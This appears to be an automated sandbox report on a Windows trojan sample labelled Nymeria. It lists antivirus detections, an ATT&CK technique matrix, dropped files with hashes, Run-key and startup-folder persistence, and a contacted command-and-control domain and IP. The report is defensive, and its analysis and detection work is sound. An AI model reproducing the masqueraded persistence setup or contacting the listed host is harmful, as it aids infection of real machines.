        Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exeCode function: 0_2_00A36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB262A bind,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_04EB25D8 bind,

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2Native API1Startup Items1Startup Items1Disable or Modify Tools11Input Capture31System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsScheduled Task/JobDLL Side-Loading1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture31Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Application Shimming1DLL Side-Loading1Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Valid Accounts2Application Shimming1Software Packing11NTDSSystem Information Discovery26Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronRegistry Run Keys / Startup Folder2Valid Accounts2DLL Side-Loading1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonAccess Token Manipulation21Masquerading12Cached Domain CredentialsSecurity Software Discovery41VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol11Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsProcess Injection412Valid Accounts2DCSyncVirtualization/Sandbox Evasion4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobRegistry Run Keys / Startup Folder2Virtualization/Sandbox Evasion4Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation21/etc/passwd and /etc/shadowApplication Window Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection412Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        e5bd3238d220c97cd4d6969abb3b33e0.exe69%ReversingLabsWin32.Trojan.Nymeria
        e5bd3238d220c97cd4d6969abb3b33e0.exe100%AviraHEUR/AGEN.1100084

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat100%AviraHEUR/AGEN.1100084
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        0.0.e5bd3238d220c97cd4d6969abb3b33e0.exe.9c0000.0.unpack100%AviraHEUR/AGEN.1100084Download File
        0.2.e5bd3238d220c97cd4d6969abb3b33e0.exe.9c0000.0.unpack100%AviraHEUR/AGEN.1100084Download File
        1.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        12.2.DiagnosticsHub.StandardCollector.Service.exe.bat.980000.0.unpack100%AviraHEUR/AGEN.1100084Download File
        12.0.DiagnosticsHub.StandardCollector.Service.exe.bat.980000.0.unpack100%AviraHEUR/AGEN.1100084Download File
        12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        14.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        windowslivesoffice.ddns.net
        		87.65.28.27
        		truetrue
          		unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          87.65.28.27
          		unknownBelgium
          		5432PROXIMUS-ISP-ASBEtrue

          Private

          IP
          127.0.0.1

          General Information

          Joe Sandbox Version:31.0.0 Red Diamond
          Analysis ID:320085
          Start date:19.11.2020
          Start time:01:51:24
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 10m 53s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:e5bd3238d220c97cd4d6969abb3b33e0 (renamed file extension from none to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:26
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/7@6/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 2.9% (good quality ratio 2.7%)
          • Quality average: 69.9%
          • Quality standard deviation: 21.2%
          HCA Information:
          • Successful, ratio: 70%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          Show All
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 168.61.161.212, 52.255.188.83, 2.20.84.85, 104.43.193.48, 51.104.144.132, 2.23.155.128, 2.23.155.153, 51.103.5.159, 95.101.22.125, 95.101.22.134, 52.155.217.156, 20.54.26.129, 51.104.139.180
          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, skypedataprdcolwus15.cloudapp.net
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/320085/sample/e5bd3238d220c97cd4d6969abb3b33e0.exe

          Simulations

          Behavior and APIs

          TimeTypeDescription
          01:52:29API Interceptor1006x Sleep call for process: RegAsm.exe modified
          01:52:30AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          01:52:38AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          87.65.28.271c2dec9cbfcd95afe13bf71910fdf95f.exeGet hashmaliciousBrowse
            Xf6v0G2wIM.exeGet hashmaliciousBrowse
              jztWD1iKrC.exeGet hashmaliciousBrowse
                wH22vdkhhU.exeGet hashmaliciousBrowse
                  AqpOn6nwXS.exeGet hashmaliciousBrowse
                    CklrD7MYX2.exeGet hashmaliciousBrowse
                      FahZG6Pdc4.exeGet hashmaliciousBrowse
                        61WlCsQR9Q.exeGet hashmaliciousBrowse
                          U7DiqWP9qu.exeGet hashmaliciousBrowse
                            d4x5rI09A7.exeGet hashmaliciousBrowse
                              1WW425NrsA.exeGet hashmaliciousBrowse
                                Kyd6mztyQ5.exeGet hashmaliciousBrowse
                                  xdNg7FUNS2.exeGet hashmaliciousBrowse
                                    14muK1SuRQ.exeGet hashmaliciousBrowse
                                      9fPECeVI6R.exeGet hashmaliciousBrowse
                                        EkOjz981VJ.exeGet hashmaliciousBrowse
                                          2WSPzeEKDI.exeGet hashmaliciousBrowse
                                            wDbrNH1KqV.exeGet hashmaliciousBrowse
                                              btxqAmncf4.exeGet hashmaliciousBrowse
                                                plMS4K3264.exeGet hashmaliciousBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  windowslivesoffice.ddns.net1c2dec9cbfcd95afe13bf71910fdf95f.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  Xf6v0G2wIM.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  jztWD1iKrC.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  wH22vdkhhU.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  AqpOn6nwXS.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  CklrD7MYX2.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  FahZG6Pdc4.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  61WlCsQR9Q.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  U7DiqWP9qu.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  d4x5rI09A7.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  1WW425NrsA.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  Kyd6mztyQ5.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  xdNg7FUNS2.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  14muK1SuRQ.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  9fPECeVI6R.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  EkOjz981VJ.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  2WSPzeEKDI.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  wDbrNH1KqV.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  btxqAmncf4.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  plMS4K3264.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  PROXIMUS-ISP-ASBE1c2dec9cbfcd95afe13bf71910fdf95f.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  Xf6v0G2wIM.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  jztWD1iKrC.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  wH22vdkhhU.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  AqpOn6nwXS.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  CklrD7MYX2.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  FahZG6Pdc4.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  WZ1j9bqSlV.exeGet hashmaliciousBrowse
                                                  • 81.241.22.161
                                                  61WlCsQR9Q.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  U7DiqWP9qu.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  d4x5rI09A7.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  1WW425NrsA.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  Kyd6mztyQ5.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  xdNg7FUNS2.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  14muK1SuRQ.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  9fPECeVI6R.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  EkOjz981VJ.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  2WSPzeEKDI.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  wDbrNH1KqV.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27
                                                  btxqAmncf4.exeGet hashmaliciousBrowse
                                                  • 87.65.28.27

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe1c2dec9cbfcd95afe13bf71910fdf95f.exeGet hashmaliciousBrowse
                                                    Xf6v0G2wIM.exeGet hashmaliciousBrowse
                                                      jztWD1iKrC.exeGet hashmaliciousBrowse
                                                        wH22vdkhhU.exeGet hashmaliciousBrowse
                                                          AqpOn6nwXS.exeGet hashmaliciousBrowse
                                                            CklrD7MYX2.exeGet hashmaliciousBrowse
                                                              FahZG6Pdc4.exeGet hashmaliciousBrowse
                                                                61WlCsQR9Q.exeGet hashmaliciousBrowse
                                                                  U7DiqWP9qu.exeGet hashmaliciousBrowse
                                                                    d4x5rI09A7.exeGet hashmaliciousBrowse
                                                                      1WW425NrsA.exeGet hashmaliciousBrowse
                                                                        Kyd6mztyQ5.exeGet hashmaliciousBrowse
                                                                          xdNg7FUNS2.exeGet hashmaliciousBrowse
                                                                            14muK1SuRQ.exeGet hashmaliciousBrowse
                                                                              9fPECeVI6R.exeGet hashmaliciousBrowse
                                                                                EkOjz981VJ.exeGet hashmaliciousBrowse
                                                                                  2WSPzeEKDI.exeGet hashmaliciousBrowse
                                                                                    wDbrNH1KqV.exeGet hashmaliciousBrowse
                                                                                      btxqAmncf4.exeGet hashmaliciousBrowse
                                                                                        plMS4K3264.exeGet hashmaliciousBrowse

                                                                                          Created / dropped Files

                                                                                          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):53248
                                                                                          Entropy (8bit):4.490095782293901
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:0P2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2wTFRJS8Ulg:HJv46yoD2BTNz1+M9GLfOw8UO
                                                                                          MD5:529695608EAFBED00ACA9E61EF333A7C
                                                                                          SHA1:68CA8B6D8E74FA4F4EE603EB862E36F2A73BC1E5
                                                                                          SHA-256:44F129DE312409D8A2DF55F655695E1D48D0DB6F20C5C7803EB0032D8E6B53D0
                                                                                          SHA-512:8FE476E0185B2B0C66F34E51899B932CB35600C753D36FE102BDA5894CDAA58410044E0A30FDBEF76A285C2C75018D7C5A9BA0763D45EC605C2BBD1EBB9ED674
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: 1c2dec9cbfcd95afe13bf71910fdf95f.exe, Detection: malicious, Browse
                                                                                          • Filename: Xf6v0G2wIM.exe, Detection: malicious, Browse
                                                                                          • Filename: jztWD1iKrC.exe, Detection: malicious, Browse
                                                                                          • Filename: wH22vdkhhU.exe, Detection: malicious, Browse
                                                                                          • Filename: AqpOn6nwXS.exe, Detection: malicious, Browse
                                                                                          • Filename: CklrD7MYX2.exe, Detection: malicious, Browse
                                                                                          • Filename: FahZG6Pdc4.exe, Detection: malicious, Browse
                                                                                          • Filename: 61WlCsQR9Q.exe, Detection: malicious, Browse
                                                                                          • Filename: U7DiqWP9qu.exe, Detection: malicious, Browse
                                                                                          • Filename: d4x5rI09A7.exe, Detection: malicious, Browse
                                                                                          • Filename: 1WW425NrsA.exe, Detection: malicious, Browse
                                                                                          • Filename: Kyd6mztyQ5.exe, Detection: malicious, Browse
                                                                                          • Filename: xdNg7FUNS2.exe, Detection: malicious, Browse
                                                                                          • Filename: 14muK1SuRQ.exe, Detection: malicious, Browse
                                                                                          • Filename: 9fPECeVI6R.exe, Detection: malicious, Browse
                                                                                          • Filename: EkOjz981VJ.exe, Detection: malicious, Browse
                                                                                          • Filename: 2WSPzeEKDI.exe, Detection: malicious, Browse
                                                                                          • Filename: wDbrNH1KqV.exe, Detection: malicious, Browse
                                                                                          • Filename: btxqAmncf4.exe, Detection: malicious, Browse
                                                                                          • Filename: plMS4K3264.exe, Detection: malicious, Browse
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z..................... .......... ........@.. ..............................N.....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):525
                                                                                          Entropy (8bit):5.2874233355119316
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
                                                                                          MD5:61CCF53571C9ABA6511D696CB0D32E45
                                                                                          SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
                                                                                          SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
                                                                                          SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
                                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):20
                                                                                          Entropy (8bit):3.6841837197791887
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:QHXMKas:Q3Las
                                                                                          MD5:B3AC9D09E3A47D5FD00C37E075A70ECB
                                                                                          SHA1:AD14E6D0E07B00BD10D77A06D68841B20675680B
                                                                                          SHA-256:7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
                                                                                          SHA-512:09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: 1,"fusion","GAC",0..
                                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):3.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:E+D9t:EC
                                                                                          MD5:71E7E5A952207AD4C834CB50F9196BF5
                                                                                          SHA1:67B0CB7D231B6150B1E3B9EF7956CCF78323C602
                                                                                          SHA-256:D582023DF0402BFBC4DC155D133389866BDD68811EC682ACFADAB8B04E971848
                                                                                          SHA-512:A69BCFF8AD1CAC8AE06C25742AD00C2B3C6132E778B25A3A79A3568F18B6CEA67ABC78178435930361764DC9F754963226E4DB5C097386E282E5BBD8BBC51D86
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview: Y0..p..H
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk
                                                                                          Process:C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 19 08:52:25 2020, mtime=Thu Nov 19 08:52:25 2020, atime=Thu Nov 19 08:52:25 2020, length=1124896, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):1053
                                                                                          Entropy (8bit):5.04565390227356
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:84W1y4GL4OkwCgUCI0J5RPIqsFwojEjAJmhy52t6RPIqsFw2wuLYch44t2Y+xIBx:84QGLIwrhnHNsQAJgE2t6N2xw7aB6m
                                                                                          MD5:DA2663B8526516E9BC52B90858834764
                                                                                          SHA1:9F97A2B56820D1783EE72F46337F72D9A62854D0
                                                                                          SHA-256:441121ACEBD6A0F3D3D3EFDD951C5006C5F00D47F727DF64E0D5222E3A35B49E
                                                                                          SHA-512:40AB2E91FC2D984B582433F394369BC2157F4172E18C311AFF14D7FAC59E5A8EDB1603273534B1F086F8C026641CC8A9FA49EE67B816E24F0148D33D7B4EE4C7
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: L..................F.... .....o.Y.....v.Y.....v.Y... *......................j.:..DG..Yr?.D..U..k0.&...&......7...#-....o.Y...T..Y.......t...CFSF..1.....sQ.N..hdwwiz....t.Y^...H.g.3..(.....gVA.G..k...>......sQ.NsQ.N.....S....................@...h.d.w.w.i.z...B...2. *..sQ.N .DIAGNO~1.BAT.........sQ.NsQ.N.....W....................-n..D.i.a.g.n.o.s.t.i.c.s.H.u.b...S.t.a.n.d.a.r.d.C.o.l.l.e.c.t.o.r...S.e.r.v.i.c.e...e.x.e...b.a.t.......y...............-.......x...........7.>......C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat..L.....\.....\.....\.....\.....\.....\.....\.h.d.w.w.i.z.\.D.i.a.g.n.o.s.t.i.c.s.H.u.b...S.t.a.n.d.a.r.d.C.o.l.l.e.c.t.o.r...S.e.r.v.i.c.e...e.x.e...b.a.t.........|....I.J.H..K..:...`.......X.......910646...........!a..%.H.VZAj...ER..0............!a..%.H.VZAj...ER..0.......................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD
                                                                                          C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
                                                                                          Process:C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1124896
                                                                                          Entropy (8bit):7.082489952218431
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:7qybFRXWsNAxCA9dpftQyNE12mHanc5vuZoX2lPA5o:bRWCoBQAEgYanc5vmo2uo
                                                                                          MD5:E10CD6FAB33374FB1A0002F89D0BFE45
                                                                                          SHA1:FF0DA20AEB8161B6053C800D2F68BDD34CCECA58
                                                                                          SHA-256:B5894CBBC3810CD2BB086AE75D02D8A3B84FA370FC8F5EEE4967C99D82D2DD69
                                                                                          SHA-512:93E8D12CC55182C93DE23DE49078CD0596C334C5F796AABC02107AF99B7369EC30DB610F229A974C276757F959F65352B583A951ED1F7CE52CCA7F30A11962FB
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          Reputation:low
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L......\.........."..........@....................@.................................p.....@...@.......@.........................|........|......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....|.......~...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                                                          \Device\ConDrv
                                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1010
                                                                                          Entropy (8bit):4.298581893109255
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:zKTDwL/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zKTDwAXZxo4ABV+SrUYE
                                                                                          MD5:367EEEC425FE7E80B723298C447E2F22
                                                                                          SHA1:3873DFC88AF504FF79231FE2BF0E3CD93CE45195
                                                                                          SHA-256:481A7A3CA0DD32DA4772718BA4C1EF3F01E8D184FE82CF6E9C5386FD343264BC
                                                                                          SHA-512:F7101541D87F045E9DBC45941CDC5A7F97F3EFC29AC0AF2710FC24FA64F0163F9463DE373A5D2BE1270126829DE81006FB8E764186374966E8D0E9BB35B7D7D6
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview: Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.8922..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information.. /? or /help Display this usage

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.082492111436444
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:e5bd3238d220c97cd4d6969abb3b33e0.exe
                                                                                          File size:1124888
                                                                                          MD5:7b00ed250c793c95f4d98c637302fb6f
                                                                                          SHA1:7f8d0c101fa8c5e875aa76c9a9c139d8800867b3
                                                                                          SHA256:5108996bad93e37f7f6e003be1edf9dba10a99fafc3894f8d4fd01226e10b0a5
